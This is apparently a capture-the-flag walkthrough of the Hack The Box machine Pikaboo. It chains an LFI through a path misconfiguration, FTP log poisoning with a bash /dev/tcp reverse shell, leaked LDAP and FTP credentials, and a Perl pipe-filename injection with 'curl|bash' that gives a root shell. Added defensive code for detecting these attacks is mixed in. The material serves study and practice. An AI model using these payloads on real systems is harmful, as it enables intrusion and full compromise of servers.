
The admin link

Even if we append anything after admin, like 'adminqwer', it still asks for authentication.
Pressing the cancel button ->

According to the nmap scan the website is served by nginx, yet the error page comes from Apache. Port 81 also appears to be some kind of proxy.

Because even /adminasdf produces a login prompt, there must be a misconfiguration in how the admin path is matched.

The same seems to be the case here: there is no trailing slash after admin.
I'll try to access common Apache files like server-status.

There is a request to admin_staging, which looks interesting.


There is an LFI.

I'll write a script ->
import requests
import re
import base64

# Interactive helper: read a server-side file through the LFI using the
# php://filter base64 wrapper, then decode what the page returns.
while True:
    i = input('> ')
    url = f'http://10.10.10.249/admin../admin_staging/index.php?page=php://filter/convert.base64-encode/resource={i}'
    r = requests.get(url)
    # The base64 text lands inside the page's panel div; pull it out.
    pattern = re.compile(r'nel">\n(.*?)</div>')
    match = pattern.finditer(r.text)
    #print(r.text)
    for matches in match:
        extracted_base64 = matches.group(1)
        decoded_bytes = base64.b64decode(extracted_base64)
        decoded_string = decoded_bytes.decode('utf-8')
        print(decoded_string)
I was not able to view any files in /etc/, like /etc/passwd, so I used a wordlist.
Fuzzing for interesting LFI files ->
➜ script wfuzz -u http://10.10.10.249/admin../admin_staging/index.php\?page\=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.249/admin../admin_staging/index.php?page=FUZZ
Total requests: 880
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000216: 200 413 L 1670 W 19803 Ch "/var/log/vsftpd.log"
000000217: 200 557 L 1381 W 169663 Ch "/var/log/wtmp"
Total time: 0
Processed Requests: 880
Filtered Requests: 878
Requests/sec.: 0
Before reading the log file, the index.php file ->
The PHP file uses include to load the requested page.

include is a dangerous function when its argument is user-controlled, because any PHP code inside the included file is executed, so an attacker who can control the contents of a file on the server gets code execution. In our case we can read vsftpd.log, and we can also write to it: when we enter wrong credentials, the attempt (including the username) is recorded in the FTP log. Because the server includes the file we name, PHP code placed in the FTP username will be executed.
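As an added defender-side example (not part of the original writeup), this scans constructed vsftpd-style log lines for failed logins whose "username" is really a PHP open tag or an implausibly long string, the two signs of the log poisoning described above. The log format and the 32-character threshold are assumptions.

```python
import re

# Constructed vsftpd-style log lines (not from the target). A failed login is
# logged with the username exactly as the client sent it, which is what turns
# the log into an attacker-writable file once an LFI can include it.
SAMPLE_VSFTPD_LOG = """\
Sun Jul 18 10:01:02 2021 [pid 1230] CONNECT: Client "10.10.14.16"
Sun Jul 18 10:01:05 2021 [pid 1229] [alice] OK LOGIN: Client "10.10.14.16"
Sun Jul 18 10:02:10 2021 [pid 1240] [<?php echo 1; ?>] FAIL LOGIN: Client "10.10.14.16"
Sun Jul 18 10:03:33 2021 [pid 1241] [bob] FAIL LOGIN: Client "10.10.14.16"
Sun Jul 18 10:04:00 2021 [pid 1242] [aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa] FAIL LOGIN: Client "10.10.14.16"
"""

# Greedy (.*) so a username containing ']' still ends at the real '] ... LOGIN:'.
LOGIN_RE = re.compile(r'\[pid \d+\] \[(.*)\] (?:OK|FAIL) LOGIN: Client "([^"]*)"')
PHP_TAG_RE = re.compile(r'<\?(?:php|=)?', re.IGNORECASE)
MAX_USERNAME = 32   # assumed local policy; tune to the real account names

def find_poisoned_logins(log_text):
    """Return (line_no, client, username, reason) for login records whose
    username looks like a log-poisoning attempt rather than an account name."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOGIN_RE.search(line)
        if not m:
            continue
        user, client = m.group(1), m.group(2)
        if PHP_TAG_RE.search(user):
            hits.append((n, client, user, 'php open tag'))
        elif len(user) > MAX_USERNAME:
            hits.append((n, client, user, 'oversized username'))
    return hits

if __name__ == '__main__':
    for hit in find_poisoned_logins(SAMPLE_VSFTPD_LOG):
        print(hit)
```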

I'll enter a PHP reverse shell as the username
➜ script ftp 10.10.10.249
Connected to 10.10.10.249.
220 (vsFTPd 3.0.3)
Name (10.10.10.249:nakul): <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/9001 0>&1'");?>
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
Now I'll reload the page.

The page hangs and we get a reverse shell.

www-data@pikaboo:/var/www/html/admin_staging$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 550/nginx: worker p
tcp 0 0 127.0.0.1:81 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:389 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 550/nginx: worker p
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
LDAP is open, but I don't have creds.
Enumerating the server, I found credentials in /opt/pokeapi/config/settings.py.
LDAP creds ->

ldapsearch -h 127.0.0.1 -x -s base namingcontexts -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: dc=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
ldapsearch -h 127.0.0.1 -x -b 'dc=htb' -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'

echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_
The credentials did not work for SSH; they were for FTP.
➜ Pikaboo ftp 10.10.10.249
Connected to 10.10.10.249.
220 (vsFTPd 3.0.3)
Name (10.10.10.249:nakul): pwnmeow
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

I looked for those folders on the server using the www-data shell.
www-data@pikaboo:/opt/pokeapi/config$ find / -type d 2>/dev/null | grep abilities
/sys/devices/platform/i8042/serio0/input/input0/capabilities
/sys/devices/platform/i8042/serio1/input/input3/capabilities
/sys/devices/platform/i8042/serio1/input/input2/capabilities
/sys/devices/platform/pcspkr/input/input5/capabilities
/sys/devices/system/cpu/vulnerabilities
/sys/devices/LNXSYSTM:00/LNXPWRBN:00/input/input4/capabilities
/srv/ftp/conquest_pokemon_abilities
/srv/ftp/abilities
/srv/ftp/pokemon_abilities
The FTP folders map to the /srv/ftp directory.
I tried to put something in the / directory and it did not work, but I am able to upload files into any other directory.
LinPEAS reported a cron job running every minute.
cat /etc/crontab

www-data@pikaboo:/opt/pokeapi/config$ cat /usr/local/bin/csvupdate_cron
#!/bin/bash
for d in /srv/ftp/*
do
cd $d
/usr/local/bin/csvupdate $(basename $d) *csv
/usr/bin/rm -rf *
done
It calls /usr/local/bin/csvupdate, which is a Perl script.
csvupdate.pl ->

The code is vulnerable to command execution in the for(<>) part: Perl's <> operator opens each @ARGV entry with two-argument open, so a filename that starts or ends with a pipe is treated as a command. This video explains the vulnerability -> https://youtu.be/iczIO8032VU?si=bLy2gsBE7YOZnleR
If I can inject a pipe |, the code will execute anything I want.
I control the parameter because I can upload files into any of the FTP directories, and the cron job runs csvupdate on every file ending in .csv. I'll upload a file whose name uses a pipe to execute my command.
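As an added example (not part of the original writeup or the box's own code), the function below models how Perl's two-argument open interprets a name handed to it by <> (an assumption based on perlfunc's open rules, not Perl itself), and a second function applies the allowlist a hardened cron wrapper should enforce before passing uploaded names to csvupdate. The UPLOADS list is constructed.

```python
import re

# Constructed list of names as they might land in an FTP-writable directory
# that the root cron job globs with *csv (the page's payload shape included).
UPLOADS = [
    'abilities.csv',
    '|ping -c 1 10.10.14.6; asdf.csv',
    'echo hi |',
    '-',
    '../etc.csv',
    'notes.txt',
]

def magic_open_mode(name):
    """Model of how Perl's two-argument open, which <> applies to every @ARGV
    entry, interprets a name (assumption: follows perlfunc's open rules).
    Perl 5.22+'s <<>> operator uses three-argument open and avoids all this."""
    s = name.strip()                 # surrounding whitespace is ignored
    if s == '-':
        return 'stdin'
    if s.startswith('|'):
        return 'pipe_to_command'     # rest of the string runs as a shell command
    if s.endswith('|'):
        return 'pipe_from_command'   # command runs, its output is read
    if s.startswith('>>'):
        return 'append'
    if s.startswith('>'):
        return 'write'
    return 'read'                    # '<name' or a plain name: opened for reading

# Allowlist a hardened cron wrapper would enforce before calling csvupdate:
# a simple basename ending in .csv, no metacharacters, no leading dot or dash.
SAFE_CSV_NAME = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.-]*\.csv$')

def partition_uploads(names):
    """Split names into ones safe to hand to csvupdate and ones to quarantine,
    tagging each rejected name with how a 2-arg open would have treated it."""
    safe, rejected = [], []
    for n in names:
        if SAFE_CSV_NAME.match(n):
            safe.append(n)
        else:
            rejected.append((n, magic_open_mode(n)))
    return safe, rejected

if __name__ == '__main__':
    print(partition_uploads(UPLOADS))
```

Note that the shell glob *csv in the cron script happily matches the pipe-prefixed name, so the glob is not a filter; the allowlist has to live in the wrapper or csvupdate itself.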
put hello.txt "|ping -c 1 10.10.14.6; asdf.csv"

I got a ping request in a minute.

Now I need a shell.
put hello.txt "|curl 10.10.14.16|bash;asdf.csv"


Got a root shell in a minute.

Root.